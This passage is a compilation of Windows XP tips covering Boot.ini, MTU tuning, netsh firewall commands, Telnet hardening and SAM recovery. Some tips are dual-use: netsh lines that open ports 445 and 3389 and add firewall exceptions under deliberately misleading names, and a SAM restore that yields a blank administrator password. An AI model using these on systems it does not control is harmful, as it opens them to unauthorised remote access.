文件保护”对话框，选择“取消”，然后选择“是”。然后你就可以按“Ctrl+Shift+Esc”或“Ctrl+Alt+Del”来使用新的任务管理器了。点击“进程”标签，然后在查看菜单下的“选择列。。。”中可以设置显示“命令行”和“映象路径” 五. 任务管理器的一个特殊功能 在点击菜单—》关机—》关闭选项的时候同时按住ctrl键的话。机器会在1秒左右关闭。 不能完成下载的原因及解决办法 2009-02-08 13:59:13 被19人转藏 | 小贴士:测试:你对别人的重要性和利用率 故障现象:使用IE下载文件，进度到 99% 时突然停止。 原因:文件其实已经下载完成，可以在Internet的临时目录中找到。问题出在下载文件从Internet临时目录移到指定下载目录这一步。 解决方法和检查点: 可以尝试按以下步骤检查后修复: 1. 如果系统中装有较多IE插件，请卸载，推荐登录 在线安, ... ,,IE修复功能。 2. 指定存放位置空间不够，请尝试指定另外的下载文件存放位置。 3. 尝试清空临时文件夹以及Cookies。 4. 运行Regedit，打开注册表编辑器，找到 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\ActiveSetup\InstalledComponents \{89820200-ECBD-11cf-8B85-00AA005B4383}，把键值从1改成0，重新启动后Windows XP将自动开始修复安装IE。 5. 如果属于网络偶然断流现象，您可将网页刷新一下，重新点击那个下载的网址，会自动接下去下载。以后下载最好用FLASHGET，它们支持断点续传。 6. 可能是磁盘空间不足。因为下载软件时是先下载到临时文件夹下，然后再Move到指定目录，如果指定目录的磁盘空间不够或写入权限不够，都会出现下载到99%中断的问题。 7. 试着清空IE缓存，把Temp文件夹下面的内容清空，然后再重试。试试 关闭杀毒软件文件监控 Boot文件讲解 2009-02-08 13:58:34 被24人转藏 | 小贴士:测试:你的内心到底偏男偏女, 在安装了多系统(如安装Win 98与Win XP)重新启动后，就会出现一个多系统启动菜单，通过选择相应菜单，回车后就可以进入相应的系统。这是由引导程序Boot.ini管理的结果，除了引导多系统外，通过修改该文件，还可以自定义个性化的系统启动。 一、打开Boot.ini文件的方法 Boot.ini文件是一个系统文件，该文件位于系统盘根目录下，如系统安装的 C盘，则该文件位置就是C:\Boot.ini，由于该文件具有隐藏属性，所以需要去除隐藏属性后才能在系统盘根目录下看到该文件，打开系统盘所在的盘符，接着依次点击“工具 — 文件夹选项”打开文件夹选择窗口，然后点击“查看”标签，去除“隐藏受保护的操作系统文件(推荐)”前的复选项，同时选择“显示所有文件和文件夹”项，最后点击“确定”按钮，这时就可以看到系统盘根目录下的Boot.ini文件，双击该文件就可以用记事本打开了。 如果你认为修改系统属性过于麻烦的话，可以右键点击“我的电脑”在弹出菜单中选择“属性”菜单，然后在“系统属性”窗口中点击“高级”标签，点击“启动和故障设置”区域里的“设置”按钮，在“启动和故障恢复”窗口中点击“编辑”按钮，就可以打开Boot.ini文件了。 还有一种非常方便的方法，只要依次点击“开始—运行”菜单，在弹出的运行窗口中输入“C:\boot.ini”，然后点击确定就可以打开Boot.ini文件了。 二、把安全模式加入启动菜单 打开Boot.ini文件，然后将[operating systems]下的 multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect复制，并在该行下面粘贴一份。 同时将其中的“Microsoft Windows XP professional”改成“Microsoft Windows XP SafeMode”，保存修改关闭Boot.ini。 如果认为手工修改Boot文件危险的话，还可以单击“开始”菜单，打开运行对话框，运行“Msconfig”打开系统配置实用程序窗口，切换到“BOOT.INI”选项卡。 选中刚刚复制且修改的一行，然后选中启动选项中的“/SAFEBOOT(F)”选项。这样就为该项添加了安全模式功能。如果需要额外的支持，还可以在“/SAFEBOOT(F)”后面选择，例如选中“NETWORK(W)”就可以实现网络支持的安全模式，做好设置之后单击“确定”按钮，这样再开机时就会多出一个启动菜单，选择其中的Microsoft Windows XP SafeMode即可进入带网络支持的安全模式了。 三、去除XP开机画面 如果不想每天在系统启动时看到XP的启动画面，只要修改一下BOOT.inn文件就可以了。打开Boot.ini文件，然后将[operating systems]下的 multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetec后面再加上参数/noguiboot，然后保存boot文件。这样重新启动后就看不到XP开机画面了。 四、自定义默认启动系统 如果安装了多个系统，那么在启动的时候会默认启动第一个系统，要想启动其它系统，就需要在启动菜单选择要启动的系统。想改变默认的启动系统，我们 可以手工改更Boot.ini文件，把想启动的系统放在第一个位置上，但这样操作的确有点不方便。其实我们可以右键点击“我的电脑”，在弹出菜单中选择“属性”，打开“系统属性对话框”，然后切换到“高级”选项卡，点击“启动和故障恢复区”的设置按钮，在弹出的“启动和故障恢复”窗口中，点击“默认操作系统”下拉菜单，选择要自定义的默认启动系统，然后点击“确定”保存修改内容。再次重新启动后，就发现我们的设置生效了。 同样，我们不用手工修改boot文件，也能轻松的删除XP的开机画面。单周“开始”菜单，打开运行对话框，输入“Msconfig”打开系统配置实用程序窗口，切换到Bootini选项卡，选中要删除开机画面的系统，然后选中“NOGUIBOOT”一项，最后点击确定，退出系统配置实用程序窗口，这样就删除了选中系统的开机画面了。 五、 用BOOT.INI实现系统多用途启动 当我们在电脑中安装了NT核心操作系统(如Windows 2000 和Windows XP)之后，每次启动计算机时都会出现一个系统引导菜单， 在此选择需要进入的系统后回车即可。这个多重引导的配置文件名为Boot.ini，配置它，我们可以轻松对电脑中的多系统进行引导，还可以通过该引导文件，设置个性化的启动菜单。Boot.ini 文件位于C 盘根目录下，是一个隐藏的系统文件，纯文本格式，可以用记事本打开编辑。 Boot.ini在引导多系统启动时提供了很多的参数命令，配置这些启动参数可以得到不同的启动效果。在默认的情况下，Boot.ini通常加载的是/fastdetect 参数，它表示启动时不检查串行口和并行口。其实我们可以更改为其他参数，更改时首先在“Boot.ini”中选择需要更改的系统列表， 随后将该系统中的参数/fastdetect 改为相应的参数值即可。以后再启动该系统就会加载一些设置信息或画面。 我们以可以在Windows XP的“系统配置实用程序” 中对一些参数进行设置(Windows 2000可以通过拷贝Windows XP的Msconfig.exe来实现)。切换到“Boot.ini”选项卡，先选中需要更改的系统，随后在“启动选项”下端勾选需要的启动参数即可。在此对几个常用参数加以说明: 1. “/SAFEBOOT”:安全模式启动，只启动注册表[HKLM\System\CurrentControlSetControl\SafeBoot] 中的驱动程序和服务，其后可跟三个参数Minimal 、Network 或者Dsrepair。Minimal 和Network 允许在网络连接下启动系统。而Dsrepair 要求系统从备份设备中调入活动目录的设置。还有一个选项是Minimal(AlternateShell)， 它让系统调入由注册表中[HKLM\System\CurrentControlSetSafeBoot\AlternateShell]指定的SHELL 程序，而不使用默认的Explorer。 2. “/NOGUIBOOT”:不加载VGA 驱动程序，也就不会显示启动过程和失败时的蓝屏信息。 3. “/BOOTLOG”:将日志写入Nnbtlog.txt 文件。 4. “/BASEVIDEO”:使用标准VGA 方式启动，这种方式主要用于显示驱动程序失效时。 5. “/SOS”:在调入驱动程序名时显示它的名称，因驱动问题而无法启动时是不二的选择。 另外，大家在使用Windows 2000/XP的时候，恐怕最容易遇到的启动故障就是“NTLDR is missing”吧,解决这种故障的通常方法是用光盘启动后进入故障恢复控制台进行修复。如果你不能忍受光盘的漫长启动过程，或者故障机上没有光驱，其实还有一种别的办法。 从上面对boot.ini的介绍，大家应该发现它和Windows 9x时代的Msdos.sys是“亲兄弟”。还记得吗,普通的DOS启动盘不能启动硬盘上的Windows 9x系统，是因为Msdos.sys是空的，只要把硬盘上的Msdos.sys文件拷贝到软盘上就可以从启动硬盘上的Windows 9x系统了。而boot.ini也有异曲同工之妙，把c盘根目录下的NTLDR、boot.ini、bootfont.bin、ntdetect.com这四个文件(这几个文件全部都是隐藏的系统文件，注意在文件夹选项中打开显示隐藏文件选项。如果是英文系统或者不需要菜单显示汉字，可以不拷贝bootfont.bin)复制到软盘上就行了。当出现“NTLDR is missing”的错误时就可以用这张软盘来引导系统，进入系统之后再把软盘上的文件拷贝到系统分区根目录就可以修复故障了。如果没有软驱，把软盘的镜像文件(可用WinImage来建立)用Nero刻录 成启动光盘也可以实现上述目的。 将收藏夹内网站按字母排序 2009-02-08 13:57:23 被25人转藏 | 小贴士:测测你是不是娱乐八卦狂人? 打开lE浏览器窗口，依次单击“工具”“lnternet选项”命令，在随后出现的设置窗口中，单击“高级”标签，并在标签页面中，选中“浏览”设置项中的“启用个性化收藏夹菜单”项目，然后单击“确定”退出设置窗口。 将IE窗口关闭然后重新启动一下，再重新单击“收藏夹”菜单时，看看有什么变化--最近访问的站点全部“跑”到收藏夹前面显示了。以后，你只要留意“收藏夹”最前面的内容，就能迅速找到经常访问的站点地址了。 另外，当你的IE收藏夹中的站点地址太多的话，很难对某个特定站点进行快速定位时，你可以按照字母先后顺序对收藏夹进行排序，以便快速定位。 具体操作为:打开注册表编辑窗口，找到分支 HKEY_CURRENT_USER SoftwareMicrosoft WindowsCurrentVersionExplorerMenuOrder上;检查一下“MenuOrder”主键，看看它的下面是否有“Favorities”选项，倘若有的话， 可以选中它并用右键单击，执行快捷菜单中的“删除”命令，将“Favorities”选项删除掉;再重新将系统启动一下，打开收藏夹后，你会发现已经被收藏的站 点，将会自动按照字母先后顺序排列了。 通过注册表优化Win XP 之ADSL 2009-02-08 13:56:47 被24人转藏 | 小贴士:我很喜欢这个口袋，我能订阅它么? ADSL优化势在必行，现特别针对使用windows XP的用户，我们优化策略介绍如下: (注意:本方法只适用于PPPoE方式的ADSL用户) 在做这些修改之前请先做好注册表的备份，以便不适合你的情况的时候或修改错误时恢复 同时这里所介绍的优化办法由于各地网络的不同不保证在您那里一定发挥作用。 Windows XP 优化注册表 Windows XP 自带PPPoE拨号，更加全面优化了网络的连接，所以我们可以优化的地方大大减少，根据目前所掌握的微软官方资料，我们仍然可以对以下几个地方进行合适自己的优化调整。 打开注册表编辑器(开始菜单->运行->输入 Regedt32.exe ->确定) 在以下几个项目加入如下几个值: 1.HKEY_LOCAL_MACHINE\System\Ccs\Services\Ndiswan\Parameters\Protocols \0 在该项目下增加以下2条键值才能对Windows XP 的MTU参数进行有效修改 ****名称: ProtocolType ****类型: REG_DWORD 双字节 ****键值:0x0800 ****名称: PPPProtocolType ****类型: REG_DWORD 双字节 ****键值:0x0021 现在就可以增加控制MTU的关键键值 ****名称: ProtocolMTU ****类型: REG_DWORD 双字节 ****键值:1492 ADSL的PPPoE用户一般设置 MaxMTU 为 1492 或更小，根据自己的检测结果输入正确值。 2、根据微软资料库说明，我们可以直接使用Windows 2000的以下优化修改 在以下几个项目加入如下几个值: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters SackOpts=00000001 (双字节DWORD值) TcpWindowSize= 0003e640 (双字节DWORD值) Tcp1323Opts=00000001(双字节DWORD值) DefaultTTL =00000040 (双字节DWORD值) EnablePMTUBHDetect =00000000(双字节DWORD值) EnablePMTUDiscovery =00000001(双字节DWORD值) GlobalMaxTcpWindowSize =0003ebc0(双字节DWORD值) 如果你使用PPPoE连接，推荐使用 0003e640 修改MTU值加快网页打开速度 2009-02-08 13:56:00 被43人转藏 | 小贴士:我很喜欢这个口袋，我能订阅它么? 什么是MTU值, MTU是Maximum Transmission Unit的缩写。意思是网络上传送的最大数据包。MTU的单位是字节。 大部分网络设备的MTU都是1500。如果本机的MTU比网关的MTU大，大的数据包就会被拆开来传送，这样会产生很多数据包碎片，增加丢包率，降低网络速度。把本机的MTU设成比网关的MTU小或相同，就可以减少丢包。 如何检测网关的MTU, 在本机打开dos窗口，执行: ping -f -l 1472 192.168.0.1 其中192.168.0.1是网关IP地址，1472是数据包的长度。请注意，上面的参数是“-l”(小写的L)，而不是“-1”。 如果能ping通，表示数据包不需要拆包，可以通过网关发送出去。 如果出现: Packet needs to be fragmented but DF set. 表示数据包需要拆开来发送。此时，减少数据包长度，再执行上面的ping命令。从1400到1472之间多试几次，就能找到合适的数据包长度了。把数据包长度加上数据包头28字节，就得到MTU的值。 如果检测到网关的MTU值是1500，不需要修改。 如果网关有防火墙ping不通，可以试试直接把MTU设为1400。 如何修改本机的MTU, 修改方法如下: (1)、运行regedit (2)、浏览到: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters \Interfaces (3)、Interfaces下有多个子项，每个子项对应一个网卡。请按如下方法选择网卡: (a)确定本机用来连接Internet的网卡或拨号连接的IP，如192.168.0.19; (b)用鼠标点击Interfaces上的子项，查看键值列表中的IPAddress项; (c)如果IPAddress的键值与(a)中的IP相同，即192.168.0.19，则该子项 就是要找的网卡。 (4)、进入该子项，在右边的窗口里按鼠标右键，选择“新建”->“双字节值”，输入名称“MTU”，按回车。再用鼠标双击“MTU”，弹出修改窗口， 填入合适的MTU的值。填写前请先把基数设为十进制。 设置好后，需要重启机器才能生效。 实例修改 在我们常用的Windows XP操作系统中，系统默认的MTU值为1500，这是一个标准以太网的设置值，并不适合宽带网络，而一般ADSL宽带的MTU在1450与1492之间，系统与ISP之间MTU的不符就会直接导致数据在网络传输过程中不断地进行分包、组包，浪费了宝贵的传输时间，也严重影响了宽带的工作效率。这就要求我们必须将本机MTU值设为与ISP所使用的MTU值一样后才能快速浏览网页、下载数据。但是，每个地区的ISP所使用的MTU值都不相同，同时ISP也会不定期地更改局端MTU大小，这给我们设置本机MTU带来了很大的不便，那么我们怎样才能知道ISP的MTU是多少呢,其实，我们平时最常用的Ping命令就能很方便地帮我们测试出本地ISP的MTU大小，如果大家感兴趣，就请跟随笔者一起来看看吧。 在广域网上，大小超出ISP要求的数据包将无法传输，而操作系统则会根据本机MTU值自动将大小不符合要求的数据进行分包处理再进行传输，所以我们可以通过向Internet上的某台主机发送一个定长数据包，并且不允许操作系统更改其大小的方式去检查该数据包能否被正常传输，如果数据包小于或等于ISP的MTU值时，传输就能正常进行，而如果发送的数据包大于ISP使用的MTU值时，传输就会失败，这样我们就能通过不断发送不同大小的数据包最终得到ISP端的MTU大小，而这个数据再加上28字节的包头信息就是我们需要的最终MTU值。 测试步骤 1. 上网，并打开“开始”菜单?“程序?附件?命令提示符” 2. 输入命令“ping –l 14xx –f www.163.com ”，这里我们解释一下命令参数的含义 * –l 14xx参数:发送一个定长数据包，14xx是要测试的包大小，如前所述，ADSL的MTU一般在1450与1492之间，第3步中将每次更换一次该值 * –f 参数:通知操作系统不能私自更改该数据包大小 * www.163.com:任意一台Internet上的主机，也可使用其它主机名或IP地址 3. 观察反馈结果并判断ISP的MTU值 1) 第一次发送测试包，包长1450 假设提示数据包过大，需要分包，因此判断该数值(1450)大于ISP的MTU，应降低包大小 2) 第二次发送测试包，包长1440 假设数据包大小降为1440，提示应为数据包过大，因此判断该值(1440)仍大于ISP的MTU，还应继续降低 3) 第三次发送测试包，包长1430 假设数据包大小降为1430，提示该数据包可以正常传输，因此判断ISP的MTU值在1440~1430之间 4) 第四次发送测试包，包长1435 假设数据包大小升为1435，提示仍然可以正常传输，因此判断MTU数值在1440~1435之间 5) 第五次发送测试包，包长1438 假设数据包大小升为1438，提示可正常传输，因此判断MTU数值在1440~1438之间 6) 第六次发送数据包，包长1439 假设数据包大小升为1439，提示因数据包过大无法传输，因此，判断出该ISP的MTU值为1438 4. 计算本地电脑的MTU值 上面得到的MTU值不能直接用于本地设置上，还应在此基础上加上28(包头大小)，因此最终的MTU数值为1466 5. 修改本机MTU值 修改本机默认的MTU值可以通过注册表来进行，但更直观稳妥的方法是使用一些系统优化软件，如“超级兔子”或“Windows优化大师”等。首先选中“使用最大传输单元”前面的勾，然后再从后面的数据栏中输入计算出的MTU值(1466)后点击确定并重启电脑即可。 总结 如上所述，整个过程可能看起来挺烦琐，但思路十分简单，而且效果不错。笔者的电脑设置了MTU值后，浏览器打开页面的速度较未设置前提高了15%，效果还是很明显的。?推荐PPOE的拨号ADSL使用，对于光纤接入或ISDN接入的宽带网络不适用此法。 命令行下配置Windows XP防火墙 2009-02-08 13:55:05 被16人转藏 | 小贴士:测测你是不是娱乐八卦狂人? 命令:netsh firewall 参数: ? // 显示命令列表 add // 添加防火墙配置 delete // 删除防火墙配置 dump // 显示一个配置脚本 help // 显示命令列表 reset // 将防火墙配置重置为默认值。 set // 设置防火墙配置 show // 显示防火墙配置 add allowedprogram // 添加防火墙允许的程序配置。 add portopening // 添加防火墙端口配置 delete allowedprogram // 删除防火墙允许的程序配置 delete portopening // 删除防火墙端口配置 set allowedprogram // 设置防火墙允许的程序配置 set icmpsetting // 设置防火墙 ICMP 配置 set logging // 设置防火墙记录配置 set multicastbroadcastresponse // 设置防火墙多播/广播响应配置 set notifications // 设置防火墙通知配置 set opmode // 设置防火墙操作配置 set portopening // 设置防火墙端口配置 set service // 设置防火墙服务配置 show allowedprogram // 显示防火墙允许的程序配置 show config // 显示防火墙配置。 show currentprofile // 显示当前防火墙配置文件 show icmpsetting // 显示防火墙 ICMP 配置 show logging // 显示防火墙记录配置 show multicastbroadcastresponse // 显示防火墙多播/广播响应配置 show notifications // 显示防火墙操作配置 show opmode // 显示防火墙端口配置 show portopening // 显示防火墙端口配置 show service // 显示防火墙服务配置 show state // 显示当前防火墙状态 例如: 命令:netsh firewall show allowedprogram //查看防火墙放行的程序 netsh firewall set portopening TCP 445 ENABLE //打开445端口 netsh firewall set portopening TCP 3389 ENABLE //不用说了，放行终端啦。。 netsh firewall delete allowedprogram C:\A.exe //删除放行程序A.exe netsh firewall set allowedprogram C:\A.exe A ENABLE //添加程序C盘下的A.exe并放行 netsh firewall add allowedprogram C:\A.exe A ENABLE //添加程序C盘下的A.exe并放行 set allowedprogram和add allowedprogram效果一样都可以添加放行程序，C:\A.exe是程序路径A是在防火墙里显示的程序名字，这个名字可以 随便写，别有用心的家伙可以用个迷惑性的名字。。呵呵。。其他命令自己试试吧。。 要是终端登陆做了IP限制的可以用netsh firewall set portopening TCP 3389 远程桌面 ENABLE CUSTOM 1.1.1.1 防御Telnet被黑客利用方法 2009-02-08 13:54:04 被19人转藏 | 小贴士:教你把口袋放到自己的桌面上吧! 方法一 在服务中找到Telnet，查看“属性”，先停止该服务，然后把启动类型设置为“禁用”。这样黑客就无法在命令行下开启Telnet了，这是目前最简单、最普遍的方法，但现在的一些开启Telnet服务的黑客工具经常被传到远程计算机上运行。 方法二 CMD下键入tlntadmn，打开Telnet服务管理器，输入“3”--显示/更改注册表设置，进入后在输入“4”(DefaultShell)，看到DefaultShell的默认值 为 %SystemRoot%\system32\cmd.exe，意思是，当用户通过了Telnet服务器认证以后，系统自动带领客户访问系统根下 system32 目录中的 cmd.exe 文件。这就是为什么当登陆Telnet服务器后，可以用命令控制服务器的原因。喔噢，知道原因就可以下手了。如果把Telnet登陆后所指向的文件指向一个不存在的文件名，那么就算黑客通过了Telnet的验证，他也没办法控制计算机。 具体步骤:接上键入Y修改DefaultShell的路径，然后把路径改 为 %SystemRoot%\system32\recf22.exe(这里假设指向了一个不存在的文件recf22.exe)，重新设置Telnet服务器的DefaultShell。 重启Telnet服务后，再试试连接Telnet服务器，运行Telnet IP，连接服务器，并按提示输入登陆帐号和密码，说明突破了NTLM认证;但输入了正确的用户名和密码后，回车却出现了“遗失对主机的连接”。哈，这两种方法如果结合起来用，可以说给你的系统加了双保险，个人认为 最有效和完美的。 误删除SAM文件的恢复 2009-02-08 13:52:48 被16人转藏 | 小贴士:测试:你对别人的重要性和利用率 1)将WINXP安装光盘放入光驱后，重启并进入“故障恢复控制台”中，输入以下命令: Copy: C:\windows\repair\system C:\windows\repair\software C:\windows\repair\sam C:\windows\repair\secutity C:\windows\repair\default 分别将 C:\windows\repair\ 下的5个文件复制到 C:\windows\system32\config 下对应的5个文件 C:\windows\system32\config\system C:\windows\system32\config\software C:\windows\system32\config\sam C:\windows\system32\config\secutity C:\windows\system32\config\default 覆盖，分别回车; 2)重启，利用“administrator”帐户，以空密码登陆; 3)在“开始”--“运行”--“CMD”中，输入命令“net user (原用户名)密码(原密码)”，回车生效 WindowsXP应用技巧及经验总结 2009-02-08 13:08:00 被36人转藏 | 小贴士:测试:你在别人眼中的真相，很真实～ 1、如何实现关机时清空页面文件 打开“控制面板”，单击“管理工具?本地安全策略?本地策略?安全选项”，双击其中“关机:清理虚拟内存页面文件”一项，单击弹出菜单中的“已启用”选项，单击“确定”即可。 2、如何自行配置Windows XP的服务 如果你是在单机使用Windows XP，那么很多服务组件是根本不需要的，额外的服务程序影响了系统的速度，完全可将这些多余的服务组件禁用。单击“开始?控制面板?管理工具?服务”，弹出服务列表窗口，有些服务已经启动，有些则没有。我们可查看相应的服务项目描述，对不需要的服务予以关闭。如“Alerter”，如果你未连上局域网且不需要管理警报，则可将其关闭。 3、Smartdrv程序有什么作用 现象:在许多有关Windows XP安装的介绍文章中都提到:“如果在DOS下安装Windows XP非常慢，肯定是安装前未运行Smartdrv.exe。我想问这个Smartdrv.exe文件有什么饔?具体如何使用? Smartdrv.exe这个文件对于熟悉DOS的朋友肯定很清楚，主要作用是为磁盘文件读写增加高速缓存。大家知道内存的读写速度比磁盘高得多，如果将内存作为磁盘读写的高速缓存可以有效提高系统运行效率。Smartdrv.exe这个文件在Windows各个版本的安装光盘中或是硬盘上的Windows/command/里都有，只有几十KB，把这个文件复制到软盘下，启动系统后直接运行这个程序(可以不加参数，该程序会自动根据内存大小分配适当的内存空间作为高速缓存)，再安装Windows XP即可。另外提醒大家，这个程序在安装完Windows后，不要运行，否则Windows可用内存将减少。 4、Win32k.sys是什么文件 现象:我刚装了Windows XP，可是接下去再装毒霸就发现病毒，位于F:WINNT SYSTEM32里的Win32k.sys文件，删又不可删，隔离又不行，在Windows 98下或DOS下删就会导致Windows XP不可启动. 这个文件是Windows XP多用户管理的驱动文件。在X:WindowsSystem32Dllcache目录下有此文件的备份。只要将此备份拷到X:WindowsSystem32下替代带病毒的文件即可。做一张Windows 98启动盘，并将Attrib.exe文件拷入软盘，此文件在装有Windows 98的机器上的X:WindowsCommand目录下。在BIOS的 Advanced BIOS Features 中将启动顺序调整为从A盘启动，进入DOS后，进入X:WindowsSystem32目录，输入Attrib -s -h -r win32k.sys，再进入X:WindowsSystem32dllcache目录下输入同样命令，再用copy win32k.sys X:windowsSystem32覆盖原文件，再重新启动即可。 5、Windows XP的开机菜单有什么含义 现象:最近我安装了Windows XP操作系统，我知道在启动时按F8键或当计算机不能正常启动时，就会进入Windows XP启动的高级选项菜单，在这里可以选择除正常启动外的8种不同的模式启动Windows XP。请问这些模式分别代表什么意思? (1)安全模式:选用安全模式启动Windows XP时，系统只使用一些最基本的文件和驱动程序启动。进入安全模式是诊断故障的一个重要步骤。如果安全模式启动后无法确定问题，或者根本无法启动安全模式，那你就可能需要使用紧急修复磁盘ERD的功能修复系统了。 (2)网络安全模式:和安全模式类似，但是增加了对网络连接的支持。在局域网环境中解决Windows XP的启动故障，此选项很有用。 (3)命令提示符的安全模式:也和安全模式类似，只使用基本的文件和驱动程序启动Windows XP。但登录后屏幕出现命令提示符，而不是Windows桌面。 (4)启用启动日志:启动Windows XP，同时将由系统加载的所有驱动程序和服务记录到文件中。文件名为ntbtlog.txt，位于Windir目录中。该日志对确定系统启动问题的准确原因很有用。 (5)启用VGA模式:使用基本VGA驱动程序启动Windows XP。当安装了使Windows XP不能正常启动的新显卡驱动程序，或由于刷新频率设置不当造成故障时，这种模式十分有用。当在安全模式下启动Windows XP时，只使用最基本的显卡驱动程序。 (6)最近一次的正确配置:选择“使用‘最后一次正确的配置’启动Windows XP”是解决诸如新添加的驱动程序与硬件不相符之类问题的一种方法。用这种方式启动，Windows XP只恢复注册表项HklmSystemCurrentControlSet下的信息。任何在其他注册表项中所做的更改均保持不变。 (7)目录服务恢复模式:不适用于Windows XP Professional。这是针对Windows XP Server操作系统的，并只用于还原域控制器上的Sysvol目录和Active Directory目录服务。 (8)调试模式:启动Windows XP，同时将调试信息通过串行电缆发送到其他计算机。如果正在或已经使用远程安装服务在你的计算机上安装Windows XP，可以看到与使用远程安装服务恢复系统相关的附加选项。 6、如何彻底删除XP 现象:我装了Windows Me和Windows XP双系统，都是FAT32格式。C盘装Windows Me，E盘装Windows XP。昨天，Windows XP系统丢失了SYSTEM32.DLL，启动不了。于是我在进入Windows Me系统内，在E盘直接删除Windows XP。但是，每次开机都出现多系统启动菜单，供选择。我该怎样才可以彻底删除XP, 用一张Windows 9x/Me的启动盘启动，在“A:”下输入“SYS C:”，给C盘重新传系统即可。 7、如何处理Windows XP不能自动关机现象 现象:我的Windows XP有时候不能自动关闭电脑，请问应该怎么办, 安装完Windows XP之后，有些计算机在单击关闭电脑之后并不能自动关闭，而需像以前的AT电源一样手动关闭。这主要是Windows XP未启用高级电源管理。修正方法:单击“开始?控制面板?性能和维护?电源选项”,在弹出的电源选项属性设置窗口中，单击“高级电源管理”并勾选“启用高级电源管理支持”。 8、如何创建“锁定计算机”的快捷方式 因有急事而需要离开，但又不希望电脑进行系统注销，该怎么办,你完全可以通过双击桌面快捷方式来迅速锁定键盘和显示器，且无需使用“Ctrl+Alt+Del”组合键或屏幕保护程序。操作方法:在桌面上单击鼠标右键，在随后出现的快捷菜单上指向“新建”，并选择“快捷方式”。接着，系统便会启动创建快 捷方式向导。请在文本框中输入下列信息:rundll32.exe user32.dll, LockWorkStation，单击“下一步”。输入快捷方式名称。你可将其命名为“锁定工作站”或选用你所喜欢的任何名称，单击“完成”。你还可对快捷方式图标进行修改(我最喜欢的一个是由Shell32.dll所提供的挂锁图标)。如需修改快捷方式图标，请执行下列操作步骤:右键单击“快捷方式”，并在随后出现的快捷菜单上选择“属性”。选择“快捷方式”选项卡，接着，单击“更改图标”按钮。在以下文件中查找图标文本框中，输入Shell32.dll，单击“确定”。从列表中选择所需图标，并单击“确定”。你还可为快捷方式指定一组快捷键，比如“Ctrl+Alt+L”。这种做法虽然只能帮助你节省一次击键，但却可使操作变得更加灵便。如需添加快捷键组合，请执行下列操作步骤:右键单击“快捷方式”，并在随后出现的快捷菜单上选择“属性”。选择“快捷方式”选项卡,在快捷键文本框中，输入任何键值，而Windows XP则会将其转换成快捷键组合(一般应采取Ctrl+Alt+任意键的形式)。如欲锁定键盘和显示器，只需双击相关快捷方式或使用所定义的快捷键即可。 9、如何调整桌面图标颜色质量 在桌面空白处单击鼠标右键，在打开的“显示 属性”对话框中选择“设置”选项卡，通过“颜色质量”下拉列表你可以调整计算机的颜色质量。你也可以通过编辑注册表来调整桌面图标的颜色质量，具体操作步骤: 打开注册表编辑器，进入HKEY_CURRENT_ USERControl PanelDesktopWindowMetrics子键分支，双击Shell Icon BPP键值项，在打开的“编辑字符串”对话框中，“数值数据”文本框内显示了桌面图标的颜色参数，系统默认的图标颜色参数为16。这里提供的可用颜色参数包括 :4表示16种颜色，8表示256种颜色，16表示65536种颜色，24表示1600万种颜色，32表示True Color(真彩色)。你可以根据自己的不需要选择和设置你的桌面图标颜色参数。单击“确定”关闭“编辑字符串”对话框。注销当前用户并重新启动计算机后设置就生效。 在桌面空白处单击鼠标右键，在打开的“显示属性”对话框中选择“外观”选项卡，在这里你可以方便地对整个桌面、窗口或者其他项目的字体和图标大小进行调整。 不过，用这种方式设置图标大小有一定局限性，比如，用户只能选择系统已经提供的桌面大小方案，不能自己任意设置桌面图标的大小。如果你想随心所欲地对桌面图标大小进行调整，可以通过编辑注册表来达到目的。具体操作步骤是: 打开注册表编辑器，进入HKEY_CURRENT_ USERControl PanelDesktopWindowMetrics子键分支，双击Shell Icon Size键值项，在打开的“编辑字符串”对话框中，“数值数据”文本框内显示了桌面图标的大小参数，系统默认29，用户可以根据自己的需要设置参数大小(参数越大，桌面图标也越大)，然后单击“确定”关闭“编辑字符串”对话框。当你注销当前用户并重新启动计算机后设置就生效。 10、如何对系统声音进行选择与设置 系统声音的选择与设置就是为系统中的事件设置声音，当事件被激活时系统会根据用户的设置自动发出声音提示用户。 选择系统声音的操作步骤如下: (1)在“控制面板”窗口中双击“声音及音频设备”图标，打开“声音及音频设备”属性对话框，它提供了检查配置系统声音环境的手段。这个对话框包含了音量、声音、音频、语声和硬件共5个选项卡。 (2)在“声音”选项卡中，“程序事件”列表框中显示了当前Windows XP中的所有声音事件。如果在声音事件的前面有一个“小喇叭”的标志，表示该声音事件有一个声音提示。要设置声音事件的声音提示，则在“程序事件”列表框中选择声音事件，然后从“声音”下拉列表中选择需要的声音文件作为声音提示。 (3)用户如果对系统提供的声音文件不满意，可以单击“浏览”按钮，弹出浏览声音对话框。在该对话框中选定声音文件，并单击“确定”按钮，回到“声音”选项卡。 (4)在Windows XP中，系统预置了多种声音方案供用户选择。用户可以从“声音方案”下拉表中选择一个方案，以便给声音事件选择声音。 (5)如果用户要自己设置配音方案，可以在“程序事件”列表框中选择需要的声音文件并配置声音，单击“声音方案”选项组中的“另存为”按钮，打开“将方案存为”对话框。在“将此配音方案存为”文本框中输入声音文件的名称后，单击“确定”按钮即可。如果用户对自己设置的配音方案不满意，可以在“声音方案”选项组中，选定该方案，然后单击“删除”按钮，删除该方案。 (6)选择“音量”选项卡，打开“音量”选项卡。你可以在“设备音量”选项组中，通过左右调整滑块改变系统输出的音量大小。如果希望在任务栏中显示音量控制图标，可以启用“将音量图标放入任务栏”复选框。 (7)你想调节各项音频输入输出的音量，单击“设备音量”区域中的“高级”按钮，在弹出的“音量控制”对话框里调节即可。这里列出了从总体音量到CD唱机、PC扬声器等单项输入输出的音量控制功能。你也可以通过选择“静音”来关闭相应的单项音量。 (8)单击“音量”选项卡中的“扬声器设置”区域中的“高级”按钮后，在弹出的“高级音频属性”对话框你可以为自己的多媒体系统设定最接近你的硬件配置的扬声器模式。 (9)在“高级音频属性”对话框中选择“性能”选项卡，这里提供了对音频播放及其硬件加速和采样率转换质量的调节功能。要说明的是，并不是所有的选项都是越高越好，你需要根据自己的硬件情况进行设定，较好的质量通常意味着较高的资源占有率。 设置完毕后，单击“确定”按钮保存设置。 11、如何分配临时管理权限 